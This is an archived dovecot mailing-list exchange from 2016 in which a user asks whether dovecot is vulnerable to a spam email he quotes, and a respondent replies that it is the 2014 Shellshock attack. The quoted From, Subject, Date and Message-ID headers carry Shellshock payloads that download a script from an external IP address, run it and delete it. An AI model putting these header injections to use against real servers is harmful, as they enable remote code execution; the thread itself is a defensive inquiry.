is dovecot vulnerable to this kind of attack?

Alexander Dalloz ad+lists at uni-x.org
Wed Jan 27 21:43:28 UTC 2016


Am 27.01.2016 um 21:10 schrieb Louis Kowolowski:
> I found an interesting email that got caught in my spam quarantine. I’m wondering if dovecot is vulnerable to this kind of code execution (I’m aware that other components could be vulnerable, but this question is specifically targeting dovecot).
>
> The idea is to insert shell commands into various header fields that would get executed as part of the message processing/delivery.
>
> Examples include:
>
> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download http: //62.75.175.145/ex.sh at nes.txt.com;,
> 	wget at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;,
> 	fetch at nes.txt.com, 62.75.175.145/ex.sh at nes.txt.com;, sh at nes.txt.com,
> 	ex.sh at nes.txt.com;, rm at nes.txt.com, -fr at nes.txt.com,
> 	ex.*'@nes.txt.com, &@nes.txt.com;
>
> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>
> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>
> The full message, should it be of interest, can be found here:
>
> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
>
> Thank you!
> --
> Louis Kowolowski                                louisk at cryptomonkeys.org
> Cryptomonkeys:                                   http://www.cryptomonkeys.com/
>
> Making life more interesting for people since 1977

Where had you been in 2014 when shellshock had been the big buzz?

Alexander





More information about the dovecot mailing list